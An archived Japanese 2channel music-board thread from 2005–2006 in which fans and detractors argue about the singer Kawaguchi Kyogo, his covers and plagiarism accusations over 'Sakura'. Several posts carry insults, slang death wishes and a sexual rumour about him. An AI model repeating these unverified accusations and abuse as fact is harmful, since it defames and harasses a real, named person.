5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

河口恭吾総合スレ

1 :NO MUSIC NO NAME:2005/09/24(土) 19:52:48 ID:LLUWHDxy
ないから立てた

2 :NO MUSIC NO NAME:2005/09/24(土) 20:44:30 ID:UMJTQzuF
お わ り

3 :NO MUSIC NO NAME:2005/09/25(日) 04:21:32 ID:NirO1Xbk


4 :NO MUSIC NO NAME:2005/09/25(日) 18:32:15 ID:ORsmsnq5


5 :NO MUSIC NO NAME:2005/09/25(日) 23:08:54 ID:6xFbMxAW
age

6 :NO MUSIC NO NAME:2005/09/25(日) 23:20:39 ID:a6K02vFd
パクリ

7 :NO MUSIC NO NAME:2005/09/26(月) 00:23:25 ID:K7KIIcfG
友達ができません・・・3(皆で幸せになろ?)
http://life7.2ch.net/test/read.cgi/jinsei/1114619574/l50

8 :NO MUSIC NO NAME:2005/09/26(月) 21:59:02 ID:ZUUT/h0J
髭面恭吾タン

9 :NO MUSIC NO NAME:2005/09/27(火) 19:54:17 ID:I9Vi7zPr
 

10 :NO MUSIC NO NAME:2005/09/28(水) 19:12:10 ID:zSbd904C
保守

11 :NO MUSIC NO NAME:2005/09/29(木) 07:05:23 ID:HMyZBGYm
ほしゅ

12 :NO MUSIC NO NAME:2005/09/29(木) 15:49:23 ID:6EYz41iq
なんでこの人のスレッド今までなかったの?
曲も作れるし実力あると思ってたんだけど

13 :NO MUSIC NO NAME:2005/10/01(土) 01:47:33 ID:FfDgakpC
HAPPY BIRTHDAY TO 河口恭吾!!☆彡

&このスレ初見記念マキコ。

14 :NO MUSIC NO NAME:2005/10/01(土) 20:01:34 ID:D/4bx40L
お願いです。人生を左右する恋の相談に乗って…
http://life7.2ch.net/test/read.cgi/jinsei/1126706485/l50

15 :NO MUSIC NO NAME:2005/10/01(土) 20:21:54 ID:r/1VUurK
桜の騒動で2chじゃ応援どころじゃないからなー
いい歌歌うと思うよ

16 :NO MUSIC NO NAME:2005/10/02(日) 08:30:15 ID:CxFNHPEz
一応公式サイト
http://www.miraclebus.com/kyogo/

夢の真ん中は結構良かった

17 :NO MUSIC NO NAME:2005/10/02(日) 10:03:41 ID:zT+7gQEc
>>15
何様でつか?(´・ω・`)

18 :NO MUSIC NO NAME:2005/10/02(日) 14:40:57 ID:eh2OL87/
今までスレなかったんだな。
この人のデビュー曲ってもう廃盤なってるの?凄い好きなんだが…

19 :NO MUSIC NO NAME:2005/10/04(火) 06:17:46 ID:HqkVo6zI
尾崎のI LOVE YOU歌ってるよね?

20 :NO MUSIC NO NAME:2005/10/07(金) 07:40:30 ID:kFQ7jxnd
10月21日から、LIVE TOUR『旅する十月の息子〜後編〜』
はじまるね。

いま恭吾ちゃんはツアリハ中!!

21 :NO MUSIC NO NAME:2005/10/08(土) 08:02:47 ID:eCksUfvR
>>18
中古あさるか借りるしかなさそう

22 :NO MUSIC NO NAME:2005/10/11(火) 19:34:59 ID:Coj80WtM
アルバム出たのに過疎だね
一応あげとく

23 :NO MUSIC NO NAME:2005/10/11(火) 22:21:48 ID:pwOFUhwR
キャーキャー言うタイプのアーティストじゃないしね

24 :NO MUSIC NO NAME:2005/10/12(水) 12:47:51 ID:ewV0Ewl/
10/3付け
初 43位河口恭吾

25 :NO MUSIC NO NAME:2005/10/12(水) 17:16:03 ID:81sfAC/H
そんなランキングはどうでもいいよ

26 :NO MUSIC NO NAME:2005/10/12(水) 18:13:15 ID:BdvDesQS
いいメロディメーカーだから作曲者としては残れると思う
シンガーとしてはどうだろうか

27 :NO MUSIC NO NAME:2005/10/12(水) 20:27:04 ID:v9Mza+Bf
>>19
徳永英明の「君のそばに」もカバーしてたよな?

28 :NO MUSIC NO NAME:2005/10/12(水) 21:48:55 ID:81sfAC/H
>>26
ちまちまでもやっていくと思うよ。

あまり生存競争厳しいとこにいないから、
彼自身のやる気さえなくならなければ聴く人はいつでもいると思う。

29 :NO MUSIC NO NAME:2005/10/15(土) 05:50:43 ID:83p9sJzw
>>19
インスパイヤだよ

30 :NO MUSIC NO NAME:2005/10/15(土) 22:15:57 ID:HIud4wi0
MUSIC ON TVのCMで弾いてる曲が気になる

31 :NO MUSIC NO NAME:2005/10/26(水) 00:04:41 ID:Oqm3sqXo
一発やになっちゃったわね

32 :NO MUSIC NO NAME:2005/10/26(水) 07:05:31 ID:g3EfyOFT
一発屋と言うほど他の作品が売れてないわけではないんだけどなぁ。
興味のない人は活動を知らないだろうけど、ちゃんとファンはいるし。

あと、いまツアー中だからね。

33 :NO MUSIC NO NAME:2005/10/27(木) 00:34:42 ID:P4I4glPd
ツアー中って普通スレ伸びない?


34 :NO MUSIC NO NAME:2005/10/27(木) 03:50:42 ID:9w2n8Wg0
>>33
なにを基準にした「普通」なんだか。

このファンはおとなの人が多いから、たぶんわざわざ荒れたところに書かないんだと思うよ。
オフィシャルあるし。

35 :NO MUSIC NO NAME:2005/10/28(金) 08:46:42 ID:EX1DAmFE
キンキキッズの今度出るアルバムに
河口「京吾」として曲提供してるらしい。

36 :NO MUSIC NO NAME:2005/10/28(金) 22:23:00 ID:keV2CA3Y
KinKiにも提供したのかぁ。聴いてみよー。

作詞・作曲名はいつも「京吾」だよね。
加山雄三の段厚作とか、あゆのCREAとかみたいな。

37 :NO MUSIC NO NAME:2005/10/29(土) 11:18:57 ID:vSOdqlv2
「Breath」 (堂本剛ソロ) 作詞/作曲:河口恭吾(京吾)
これか

38 :NO MUSIC NO NAME:2005/11/04(金) 09:17:43 ID:xGrWBBkD
http://page7.auctions.yahoo.co.jp/jp/auction/g35397822

39 :NO MUSIC NO NAME:2005/11/04(金) 10:27:50 ID:1CTCKVtn
こないだ働いてるうちの店に来たよ 気付かなかった・・接客したのに
グラスペア買ってった。

ごめん

40 :NO MUSIC NO NAME:2005/11/04(金) 14:01:01 ID:B8wSB7sn
>>39
なんで「ごめん」なの?
どこの店?

41 :NO MUSIC NO NAME:2005/11/04(金) 15:26:48 ID:B8wSB7sn
つうかこういうのって乙スレみたいで気分悪いな。
やめた、>>40の質問取り消し。

42 :NO MUSIC NO NAME:2005/11/04(金) 23:54:48 ID:1CTCKVtn
話したのに本人と気付かなくてごめん

43 :NO MUSIC NO NAME:2005/11/05(土) 00:31:06 ID:q3PchrQy
>>42
ほんとに本人だったの?

44 :NO MUSIC NO NAME:2005/11/08(火) 01:32:10 ID:3w0FAnN0
スタッフ?マネージャー?の女の人と二人で来てた
薄めのサングラスかけててけっこー悩んでたからお薦め言ったらそれに決めてくれた。
一客5000円ペアだから10000円のプレゼントギフト

帰った後同僚がさっきの“桜”歌ってる人じゃん!
って言って気付いた
ちょいえらそーだった

45 :NO MUSIC NO NAME:2005/11/08(火) 04:48:57 ID:M7v5FNua
仕事の合間に来たのかな。
忙しいとそっけなくもなるさね。

46 :NO MUSIC NO NAME:2005/11/13(日) 01:22:44 ID:SUA+Yh14
LIVE TOUR「旅する十月の息子〜後編〜」
折り返し地点を過ぎましたー

47 :NO MUSIC NO NAME:2005/11/14(月) 12:27:35 ID:CLkfv8ya
やっぱりえらそうなんだな
ちきしょうめが

48 :NO MUSIC NO NAME:2005/11/14(月) 15:01:47 ID:x06CLRjU
2ちゃんを鵜呑みにするなよ
ちきしょうめが

49 :NO MUSIC NO NAME:2005/11/15(火) 18:57:10 ID:G462cXeq








河口恭吾氏「桜」疑惑まとめサイト
http://www.geocities.jp/he_was_born/
「桜」パクリ検証フラッシュ
http://www.geocities.jp/he_was_born/sakura.swf
河口恭吾「アスナロ(桜のカップリング)」 &ZARD「マイフレンド」
http://www.geocities.jp/he_was_born/as.mp3








50 :NO MUSIC NO NAME:2005/11/15(火) 21:31:59 ID:CzqKPIqv
>>49
宣伝乙です。
いちおう「音楽サロン邦楽」板のほうに、アンチ専用スレがありますんで
そっちでおながいしますね。
せっかくそちらがあるんでこっちはとりあえずマターリといかせてくださいませ〜。

51 :NO MUSIC NO NAME:2005/11/16(水) 20:54:37 ID:QP+nWN26
マターリしすぎでやばいんですが

52 :NO MUSIC NO NAME:2005/11/16(水) 23:10:30 ID:Q0cse7dN
「マターリ」に「しすぎ」はありません
やばくないですよ

53 :NO MUSIC NO NAME:2005/11/17(木) 16:42:05 ID:mM7r7CiR
age

54 :NO MUSIC NO NAME:2005/11/19(土) 17:24:26 ID:FZFgvrUU
河口さんの事をパクリとか言う人もいますがデタラメです!
河口さんが中学の時に作った「桜」を聴いた徳永って人がパクったんです!

55 :NO MUSIC NO NAME:2005/11/19(土) 17:37:40 ID:FZFgvrUU
あっちのパクリスレにカキコするつもりだったのに、間違えた。メンゴ。

56 :NO MUSIC NO NAME:2005/11/19(土) 18:09:45 ID:glften2K
>>54-55
おっけー。どんまい!

57 :NO MUSIC NO NAME:2005/11/25(金) 15:46:55 ID:N5bJpT8v
夢の真ん中が20円で売ってたから買ってきた。
この曲好き。

58 :NO MUSIC NO NAME:2005/11/26(土) 03:45:21 ID:U0jbLas/
>>57
いいよねー。裏声がたまらんね。

59 :NO MUSIC NO NAME:2005/11/27(日) 06:32:59 ID:a35bo7Vi
20円の歌声(・∀・)スッポン!

60 :NO MUSIC NO NAME:2005/11/27(日) 07:01:54 ID:fP3zc6LX
廃盤でない中古で、ジャケがレアとかじゃなけりゃ20円は普通。
20円の歌声っつーのはちと違う。

61 :NO MUSIC NO NAME:2005/11/28(月) 01:31:32 ID:wRv606td
携帯版オフィHPが見れなくなってるんだけど、漏れだけ?今だけ?工事中?

62 :NO MUSIC NO NAME:2005/12/04(日) 13:58:37 ID:eawvaFye
9日は栃木だね〜。
早めに入って実家に帰るかな?

旅する十月の息子〜後編〜も残すところあと3公演。
栃木では是非ゆっくりして下さぁい恭吾さん。

63 :NO MUSIC NO NAME:2005/12/07(水) 00:21:58 ID:jK/hlrGs
こいつパクリマンwだし、歌下手だし、なんなの?プロ?
尾崎のアイラブユー歌ってるけど超下手。笑った。よく
請けたよ。尾崎って上手いんだなぁ・・・と再認識した。
あ、僕尾崎ファンじゃないですよ。むしろ嫌いです。

こいつ沖縄の離島でライブやった時、客の集まりが悪いから
って開始遅らせたんだよ。思い上がりも甚だしい。時間
通り待ってた人もいるんだよ?お前ごときが何様?w

64 :NO MUSIC NO NAME:2005/12/07(水) 01:43:29 ID:n70Pipn8
>>63
ここは一応ファンスレとして機能してまして、
アンチは下記のスレ(@音楽サロン邦楽板)に集まってるみたいです。
できればそちらでお願いします。

http://music5.2ch.net/test/read.cgi/mjsaloon/1118919052/

65 :NO MUSIC NO NAME:2005/12/08(木) 04:54:31 ID:6uh5cqAf
河口さんって、今、東京のどこに住んでるの?

66 :NO MUSIC NO NAME:2005/12/09(金) 11:41:42 ID:iESKMBFU
今日の栃木はチケットあまり売れなかったみたい。

67 :NO MUSIC NO NAME:2005/12/09(金) 13:53:42 ID:/91hGYlQ
あっそ

68 :NO MUSIC NO NAME:2005/12/09(金) 19:50:42 ID:NL90L8S/
パクリ歌手人気無しw

69 :NO MUSIC NO NAME:2005/12/10(土) 04:45:18 ID:CDkO8XvM
人気あるジャン。
田舎は入らんよ。入るところはしょっちゅうSOLD OUT。
追加もやるしな。

70 :NO MUSIC NO NAME:2005/12/10(土) 23:18:24 ID:gSTht/JR
総合スレって書いてあるだろう。ファンもアンチも関係無いだろ。
それにこのスレ誰も来ないんだからいいじゃねえか。

しかしあの尾崎の歌歌ってるCM、始めは名前隠してたなw。
問い合わせ殺到!とか思ってたのかな、関係者。バカだねぇ・・・
そこいらのカラオケ行けば5〜6人はこのくらい歌えるの
いるよな。ほんとこいつレベル低いからな。

71 :NO MUSIC NO NAME:2005/12/11(日) 07:36:09 ID:XMFAf7gH
さびしがりやのジャイアン登場。

72 :NO MUSIC NO NAME:2005/12/13(火) 23:50:40 ID:1ZlaN8qz
尾崎のうた自体が歌いやすいんだよ。福山、氷室、藤井レベルと同じで誰でも等しく歌える簡単さなんだから。

73 :NO MUSIC NO NAME:2005/12/17(土) 20:08:17 ID:2Af6Lt0L
恭吾くんは
業界の男たちに愛されて
前と後ろを捧げて
ここまで来たのよ。
いい男よ、弱さと男臭さがあって。


74 :NO MUSIC NO NAME:2005/12/17(土) 22:15:15 ID:RDiMvczR
尾崎豊の名を汚さないでください!
徳永さんまで傷つけて次は尾崎ですか?
いい加減にしてください
貴方は歌手としてのプライドがないんですか???

75 :NO MUSIC NO NAME:2005/12/17(土) 23:30:36 ID:4d8rfiwm
尾崎の歌が歌いやすいのはわかるよ。でも誰が歌っても80点くらいは
取れるからプロなら95点は取らなければいけないよな?それが82〜3
点くらいだよな、河口。

こいつはプライドのかけらも無いよ。ガツガツしてんじゃん。みっともねえ。

76 :NO MUSIC NO NAME:2005/12/18(日) 02:59:18 ID:ajLBkGKC
みんな、ファンです。

77 :NO MUSIC NO NAME:2005/12/19(月) 00:06:04 ID:ajLBkGKC
安田祥子、由紀さおり姉妹20周年記念公演age

78 :NO MUSIC NO NAME:2005/12/20(火) 13:49:50 ID:WWilobm2
え、ファンっていたの!??wwこいつの。

79 :NO MUSIC NO NAME:2005/12/20(火) 13:56:44 ID:yKAdCpvx
>>75
アフォ

80 :NO MUSIC NO NAME:2005/12/20(火) 17:11:50 ID:XLC99nO1
俺河口って憧れる。顎のひげは置いといて、あの細めのズボンにカッターシャツ。着飾らないところが。男らしさを感じる!!

81 :nttkyo087023.tkyo.nt.adsl.ppp.infoweb.ne.jp:2005/12/20(火) 21:57:10 ID:GXS2DV1j
syosinsya

82 :NO MUSIC NO NAME:2005/12/21(水) 02:37:45 ID:4iei3Kii
嫌いじゃないがこいつは消えるな


83 :NO MUSIC NO NAME:2005/12/21(水) 05:04:06 ID:FTJGTnYr
嫌味を言われる人は残ります。

84 :NO MUSIC NO NAME:2005/12/23(金) 15:43:53 ID:CGL4tUr1
今日追加公演だっけ?age∩( ・∀・)∩

85 :NO MUSIC NO NAME:2005/12/24(土) 09:28:33 ID:G2eiaf8V
河口恭吾が尾崎の歌歌ってるのどこかDLできるとこ知りませんか?

86 :NO MUSIC NO NAME:2005/12/25(日) 12:28:30 ID:vAop9KV0
>85
CDは2月22日に出るらしいですよ

87 :NO MUSIC NO NAME:2005/12/26(月) 23:48:08 ID:WeH1I68b
2月22日…

    /l、
   (゚、 。 7
     l、~ ヽ   まだかにゃん…
    じし' )ノ

88 :NO MUSIC NO NAME:2005/12/27(火) 20:27:29 ID:pqZw0jyS
●来年消えそうなアーティストは誰ですか? 日経エンタテイメントより
*1位 D-51
*2位 河口恭吾
*3位 光永亮太
*4位 サスケ
*5位 川嶋あい
*6位 HIGH and MIGHTY COLOR
*7位 森山直太郎
*8位 平原綾香
*9位 元ちとせ
10位 木村カエラ

11位 アンダーグラフ
12位 オレンジレンジ
13位 Def Tech
14位 ゴリエ
15位 サンボマスター
16位 モーニング娘。
17位 綾小路きみまろ
18位 Vo Vo Tau
19位 上原あずみ
20位 GLAY

89 :NO MUSIC NO NAME:2005/12/28(水) 01:29:15 ID:tyuW4zAg
まああれだ。
あえてマジレスすると、ランキングが上位というのはいいことだ。
どの業界でもそうだ。

90 :NO MUSIC NO NAME:2005/12/28(水) 13:30:28 ID:AMCS5zir
大晦日、武道館出演はガイシュツ?

91 :NO MUSIC NO NAME:2005/12/28(水) 21:25:31 ID:tyuW4zAg
ガイシュツじゃないよ〜

フミヤとのカウントダウンだよね

92 :NO MUSIC NO NAME:2005/12/31(土) 16:37:39 ID:YCM8dU0n
フミヤage∩( ・ω・)∩

93 :NO MUSIC NO NAME:2005/12/31(土) 22:35:16 ID:HomhO708
恭吾君良かったよ
前の人が微妙な空気垂れ流してくれたんでおかげで助かりました
サンキューノシ

94 :NO MUSIC NO NAME:2005/12/31(土) 22:47:27 ID:IJmdqShB
他板からおじゃまします。
剛に素敵な曲を作ってくれてありがとう。

95 :NO MUSIC NO NAME:2006/01/01(日) 01:34:29 ID:YqqYj6Wh
はじめまして。さっき武道館で生歌聴きました。
すごい良い声ですね。
会場の反応良かったですよ。拍手が一番盛大でしたから。

96 :NO MUSIC NO NAME:2006/01/01(日) 16:52:21 ID:CbWP59ml
私も初めて聴いた。
アンコールの声がかかってたよ。
やらなかったけど。

97 : 【豚】 【270円】 :2006/01/01(日) 17:00:11 ID:vD5dJw+x
桜やらんかったからでしょ?
でもILOVEyouはマジ感動した
なんつうか2005年の自分の出来事が浮かんできてヤバカッタ

98 :NO MUSIC NO NAME:2006/01/02(月) 03:37:42 ID:9CKzwsrP
武道館に居た一人です。
I Love you非常にきれいでした
感動ものです。
元々めざましTVなどで特集してる人で知ってたけど、こんなにうまい人だとおもわなかった

99 :NO MUSIC NO NAME:2006/01/05(木) 00:11:22 ID:MWlupTag
>>98
尾崎の聞いてみ!5兆倍いいから
人の歌で名をあげようって根性が気にくわん。

100 :NO MUSIC NO NAME:2006/01/05(木) 01:13:17 ID:6ONN66so
100ゲッツ

101 :NO MUSIC NO NAME:2006/01/05(木) 03:10:35 ID:lz60qcUA
>>99
もちろん尾崎のも知っていますよ。
リアルな年代ですから。

>人の歌で名をあげよう
そんなこと思っていないでしょ。
いい曲だからこそ、カバーしているのでは?

102 :NO MUSIC NO NAME:2006/01/05(木) 08:20:10 ID:msBQDxjg
オフィシャルHPがリニュ-アルされてた(*´д`*)

103 :NO MUSIC NO NAME:2006/01/05(木) 15:15:55 ID:WFv5WXy0
プロフィールの生年月日明らかに違うよね・・・・

104 :NO MUSIC NO NAME:2006/01/05(木) 19:43:27 ID:msBQDxjg
>>103
ほんとだ、恭吾タンが11歳になっとる!w

105 :NO MUSIC NO NAME:2006/01/06(金) 01:45:40 ID:mQ/ciHUw
今回の武道館は確かに良かった。
例のジョンレノン音楽祭も見たこっちとしてはハラハラものだったが…

しかし雑誌で叩かれたんだから桜はもう歌われんだろうな。

106 :NO MUSIC NO NAME:2006/01/06(金) 21:59:26 ID:LQq9m1jI
>>105
叩かれたから歌わないんじゃなくて、
「河口恭吾=桜のお兄さん」みたいなイメージをいつまでも持たれたくないからかもね。

107 :NO MUSIC NO NAME:2006/01/07(土) 00:26:08 ID:Z/HDpvq/
バカファンって何でも良いほうに解釈するね。こいつのアイラブユー
は下手すぎ。発声練習も足りてないしな。

最近のアーティストwって作り出す事が出来ないんだね。いい曲をすぐ
カバーしちゃう。それも懐かし系。オリジナル知らない若い人達は
飛びついちゃうよ。だっていい曲だから。

108 :NO MUSIC NO NAME:2006/01/07(土) 02:55:22 ID:7nCqbRUa
若い人じゃないけど飛びついちゃったw

109 :NO MUSIC NO NAME:2006/01/07(土) 03:03:16 ID:7nCqbRUa
ていうかアンチっていつも、にぎやかなスレの方に来るんだね。
アンチスレあるのに寂しい人だね。

110 :NO MUSIC NO NAME:2006/01/07(土) 07:34:11 ID:u61K8wa3
ILoveYouはね
尾崎豊のプロデューサーの人にカバーしてみないかと
持ち掛けられて
CDにする気はなかったが
問い合わせが凄くて
二月のベストに収録するって
ライブで言ってたよ!

111 :NO MUSIC NO NAME:2006/01/08(日) 11:36:11 ID:ThbmjTHo
武道館で聴いた者から一言。
アンコールは一般人としては唯一知ってる曲、
『桜』歌わないかゴラァ-なノリだったよ。

112 :NO MUSIC NO NAME:2006/01/08(日) 13:11:28 ID:7qsVgJg0
【音楽】河口恭吾「桜」盗作疑惑が日経エンタについに掲載!HIGHWAY61に続いて疑惑再燃か!?
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/l50

113 :NO MUSIC NO NAME:2006/01/08(日) 13:30:25 ID:DzkZMcbc
大物歌手になるとよく囁かれる盗作疑惑。
本当にありがとうございました。

114 :NO MUSIC NO NAME:2006/01/08(日) 14:23:52 ID:DzkZMcbc
なるほど。
>>112のリンク先を読むと、河口恭吾を良く思わないキャップが、
さも「日経エンタに、河口の盗作疑惑に関する“記事”が掲載された」
かのように取られかねない非常に語弊のあるスレタイで、
誤解を受けかねない事を承知でわざと私怨たっぷりにスレを立てた、でFAか・・・。

↓↓この辺参照↓↓
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/7-11
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/16
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/27
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/30
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/41
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/48
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/53-54
http://news18.2ch.net/test/read.cgi/mnewsplus/1136471867/68-69

115 :NO MUSIC NO NAME:2006/01/08(日) 15:07:46 ID:7qsVgJg0
まぁパクった事実は変わらないよ

116 :NO MUSIC NO NAME:2006/01/09(月) 00:02:07 ID:qdCzS5r7
↑寂しがりやさん乙かれさん

117 :NO MUSIC NO NAME:2006/01/09(月) 23:48:45 ID:Qy4zRJ12
>>116
パクり擁護乙かれさん

118 :NO MUSIC NO NAME:2006/01/10(火) 00:42:37 ID:AW2TJ8J1
>>117
負け惜しみ乙かれさん

119 :NO MUSIC NO NAME:2006/01/10(火) 01:33:17 ID:kE3ww2df
>>118
ホモだちの友情乙かれさん

120 :NO MUSIC NO NAME:2006/01/10(火) 01:51:27 ID:AW2TJ8J1
やれやれ・・・意味不明なんだが「寂しがりや」が図星だったってことか
この粘着っぷり

121 :NO MUSIC NO NAME:2006/01/12(木) 22:33:24 ID:LqVGvjIN
通常版にも特典があるから2枚買わなくちゃ(゚∀゚)アヒャ

122 :NO MUSIC NO NAME:2006/01/13(金) 01:30:09 ID:ygt9qnkm
パクリー河口に改名するって本当ですか?

123 :NO MUSIC NO NAME:2006/01/13(金) 01:55:58 ID:/6OUkjte
2月22日が楽しみダワァ

124 :NO MUSIC NO NAME:2006/01/14(土) 01:09:36 ID:3kRnAcqO
窃盗と一緒

125 :NO MUSIC NO NAME:2006/01/14(土) 07:20:55 ID:O2n1aHgN
被害者が被害に遭っていないという窃盗か。冤罪だな。

126 :NO MUSIC NO NAME:2006/01/14(土) 08:56:30 ID:jFDyGyQm
ベストって・・・何曲パクってるか気になるところだ。

127 :NO MUSIC NO NAME:2006/01/14(土) 09:41:11 ID:O2n1aHgN
是非買って聴いてみてよ

128 :NO MUSIC NO NAME:2006/01/16(月) 23:01:41 ID:rEK9/gsI
粘着電波が張り付いていてお気の毒
みんなしらけて寄り付かないんですね。良い曲唄うのに。


129 :NO MUSIC NO NAME:2006/01/16(月) 23:11:19 ID:UqXdaDIO
>>128
人の曲だけどな ( ´,_ゝ`)プッ

130 :NO MUSIC NO NAME:2006/01/17(火) 00:14:52 ID:baEZwolR
↑粘着電波

131 :NO MUSIC NO NAME:2006/01/17(火) 00:24:12 ID:xqgI6K68
>>130
こいつも粘着

132 :NO MUSIC NO NAME:2006/01/17(火) 02:55:57 ID:sABqh8zx
>>131
自分のこと言われたからといって名乗り出なくてよろしい。

133 :NO MUSIC NO NAME:2006/01/18(水) 00:44:42 ID:zSwAWqyf
>>132
君も頑張るね。

134 :NO MUSIC NO NAME:2006/01/18(水) 01:59:55 ID:NXOF4Y+w
>>133
毎晩ご苦労さん

135 :NO MUSIC NO NAME:2006/01/19(木) 16:32:46 ID:9g6LDIhh
ILoveYou歌わないでよ

136 :NO MUSIC NO NAME:2006/01/20(金) 01:00:42 ID:PQ5uJPZz
ヲタとアンチがほどよい関係のスレですね( ・∀・)

137 :NO MUSIC NO NAME:2006/01/20(金) 01:41:55 ID:G5lUFFfb
と、アンチが申しております( ・∀・)

138 :NO MUSIC NO NAME:2006/01/20(金) 03:20:39 ID:s4nxOaa6
パクリはあかん

139 :NO MUSIC NO NAME:2006/01/20(金) 12:31:54 ID:G5lUFFfb
粘着はあかん

140 :NO MUSIC NO NAME:2006/01/21(土) 08:19:57 ID:2KwqUG6A
アゴ髭もあかん

141 :NO MUSIC NO NAME:2006/01/21(土) 14:46:45 ID:jWZrIKrI
>>140
保守乙です!

142 :NO MUSIC NO NAME:2006/02/05(日) 02:23:45 ID:oh9daOQx
てか今回のベストアルバムのジャケットって、
尾崎豊のベストアルバム「愛すべきものすべてに」とそっくりじゃん。
徳永英明と尾崎豊が好きな俺からすると、ほんと腹が立つな。


143 :NO MUSIC NO NAME:2006/02/06(月) 17:21:22 ID:PzFLLVzl
結局、一発屋か!!  やっぱパクリはだめっしょ

144 :sage:2006/02/07(火) 00:41:54 ID:dKn14GMx
一応音楽やってるものとしてパクリは良くないですね
何がいけないって認めないのがダメです
オリジナルを作った人が苦労して生み出したものを平然と盗んで大物気取り
人として恥ずかしくないのだろうか

145 :NO MUSIC NO NAME:2006/02/08(水) 18:19:08 ID:KPIyUMgt
パクリで一発屋ってある意味最強
最近話題の川嶋あいはそれに加えて売名行為してるからこいつのほうが幾分マシに思えてきた

146 :NO MUSIC NO NAME:2006/02/12(日) 21:05:40 ID:AKgva0np
>>142
アホか!!
尾崎豊の方が河口さんのジャケットをパクッたんだヨ!
徳永ファンも尾崎ファンも河口さんの才能に嫉妬し過ぎ

147 :NO MUSIC NO NAME:2006/02/12(日) 21:07:09 ID:IMBaj/br
>>146
その通り!河口最高!





氏ね。

148 :Track No.774:2006/02/13(月) 11:13:53 ID:tvs95843
ベストアルバムカタログ
http://best.jounin.jp/

149 :NO MUSIC NO NAME:2006/02/14(火) 22:46:17 ID:us6+YuxU
日本一女々しい歌い方する河口
キモすぎ
しかもパクっても売れねえ
早く消えろよ

150 :NO MUSIC NO NAME:2006/02/17(金) 13:17:33 ID:YKDl5QhZ
22日にアルバム発売なのか。
徳永英明も同じ日にアルバム発売するんだよな。
しかも僕のそばにが入ってるバラードBEST…。

151 :NO MUSIC NO NAME:2006/02/17(金) 13:25:14 ID:lfAeW/YT
初めてここきたんだが
あの尾崎の歌をCMでうたってる奴ってこの人?
あれは酷いね、止めて貰いたい。

152 :NO MUSIC NO NAME:2006/02/17(金) 23:46:54 ID:fRiXZa62
ダイハツもいつまであのCM流す気なんだろ?

153 :NO MUSIC NO NAME:2006/02/19(日) 01:56:22 ID:OJW1Cxr6
この人ってファンいるのかな?かわいそうだねぇw

154 :NO MUSIC NO NAME:2006/02/21(火) 09:58:03 ID:philsyxs
あの〜、ほかの掲示板でちょっと問題になってるんだけど、これって河口恭吾のうたを携帯で録ってるよね?

http://n.pic.to/24wjd
最初の音は不自然だけど。

155 :NO MUSIC NO NAME:2006/02/22(水) 19:34:49 ID:LT5ofhJl
ベストアルバムがデイリー圏外wwwwwwww
終わってるな

156 :NO MUSIC NO NAME:2006/02/23(木) 01:10:07 ID:4TQHYiQT
>>155
て 言うか、始まってないから。

157 :NO MUSIC NO NAME:2006/02/23(木) 11:21:57 ID:8xJ/WOW5
人気ないねーー今日いいともに、でるんでしょ?
スルーーーってかぁ

158 :NO MUSIC NO NAME:2006/02/23(木) 12:14:23 ID:5ZVUwbjb
まったく意味ないスレ

159 :NO MUSIC NO NAME:2006/02/23(木) 12:19:43 ID:yN+P/NWh
不愉快だからI LOVE YOU歌わせるなよ!!!
尾崎豊に失礼だ
誰の許可をとって歌ってるんだ

160 :NO MUSIC NO NAME:2006/02/23(木) 12:23:00 ID:yN+P/NWh
こいつのアルバムオリコン何位?

161 :NO MUSIC NO NAME:2006/02/23(木) 12:24:51 ID:bn0A8ME1
>>160
               |    初 28 河口恭吾(I LOVE YOU 〜singles〜)

162 :NO MUSIC NO NAME:2006/02/23(木) 13:03:14 ID:yN+P/NWh
いつごろレコード会社から追い出される予定ですか?
音楽番組も出させてくれないんですか河口さんは?w

163 :ツマ ◆BUKI.aHIhs :2006/02/23(木) 13:28:33 ID:lAnDXyD2
なんかどんどん顔が膨らんできてる気がする

164 :NO MUSIC NO NAME:2006/02/23(木) 14:05:31 ID:yN+P/NWh
ちょっと太ってる風に見えた

165 :NO MUSIC NO NAME:2006/02/23(木) 14:14:23 ID:6oJ3UKBb
今日のいいとも観るまでこいつの存在忘れたてたw

166 :NO MUSIC NO NAME:2006/02/23(木) 14:19:30 ID:s6pgxwJ/
素直にキモい

167 :NO MUSIC NO NAME:2006/02/23(木) 19:53:41 ID:T0j8LY9K
いいとも出てたのかい?

168 :NO MUSIC NO NAME:2006/02/23(木) 21:48:53 ID:UxV8tKcN
出てたよ↑

169 :ていうか:2006/02/24(金) 03:06:03 ID:6sGt3czS
歌下手やのに何故売れたんやろう?今だに不思議。もっとうまい奴いっぱいおるやろう。なぜ?プロデューサーにお金でも積んだんか?

170 :NO MUSIC NO NAME:2006/02/24(金) 11:11:18 ID:kDcpuTnJ
http://life7.2ch.net/test/read.cgi/jinsei/1124627396/l50

726 :アゲハ ◆0VGwGoZAhU :2006/02/24(金) 08:46:19 ID:GOzEZRoD
だからいちいちageるなよw

まぁ、確かにここのところは詩的な独り言ばかりになってるからな
板の趣旨とは大分ずれてきたかもな

agesage議論で大荒れです

171 :NO MUSIC NO NAME:2006/02/24(金) 17:23:50 ID:uhV+7H5w
夢の真ん中はスピッツの楓のパクリ
しかも徳永と同じ日にベスト出すなんて最悪ですね
早く氏んでください

172 :NO MUSIC NO NAME:2006/02/24(金) 18:27:04 ID:DKkSBkSe
ブロードバンドニッポン聞け

173 :NO MUSIC NO NAME:2006/02/25(土) 19:58:23 ID:dQTaFAj7
アルバムの売上が上がっちゃったよ?

174 :NO MUSIC NO NAME:2006/02/27(月) 00:07:11 ID:ZGKZ2LJV
歌下手すぎ。声出てないね。基本からやり直せ。
尾崎のカバー曲も下手。よく恥ずかしげ無く歌えるよな。

175 :NO MUSIC NO NAME:2006/02/27(月) 19:53:04 ID:a/D4IV03
徳永英明の声を真似してるの?
こいつってオリジナル曲ないの?
外見も某歌手のパクリっぽいし外見から中身までパクリでできてるんですね

176 :NO MUSIC NO NAME:2006/02/27(月) 23:27:18 ID:B9yco4I0
こいつは最低のクズ。
